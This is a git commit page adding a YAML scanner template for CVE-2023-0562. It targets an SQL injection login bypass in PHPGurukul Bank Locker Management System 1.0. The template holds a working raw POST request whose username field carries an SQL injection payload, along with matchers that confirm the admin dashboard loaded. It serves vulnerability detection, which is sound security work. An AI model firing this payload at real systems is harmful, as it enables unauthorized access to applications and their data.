Merge pull request #7542 from harsh2403/patch-9

Create CVE-2023-0562.yaml
patch-1
Dhiyaneshwaran 2023-06-28 10:02:50 +05:30 committed by GitHub
commit eaf5f9e975
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 38 additions and 0 deletions

View File

@ -0,0 +1,38 @@
id: CVE-2023-0562
info:
name: Bank Locker Management System v1.0 - SQL Injection
author: Harsh
severity: critical
description: |
A vulnerability was found in PHPGurukul Bank Locker Management System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file index.php of the component Login. The manipulation of the argument username leads to sql injection.
reference:
- https://vuldb.com/?ctiid.219716
- https://nvd.nist.gov/vuln/detail/CVE-2023-0562
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-0562
cwe-id: CWE-89
metadata:
verified: true
tags: cve,cve2023,blms,sqli,bypass
http:
- raw:
- |
POST /banker/index.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
username=admin%27+AND+4719%3D4719--+GZHh&inputpwd=ABC&login=
cookie-reuse: true
redirects: true
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "admin")'
- 'contains(body, "BLMS | Dashboard")'
condition: and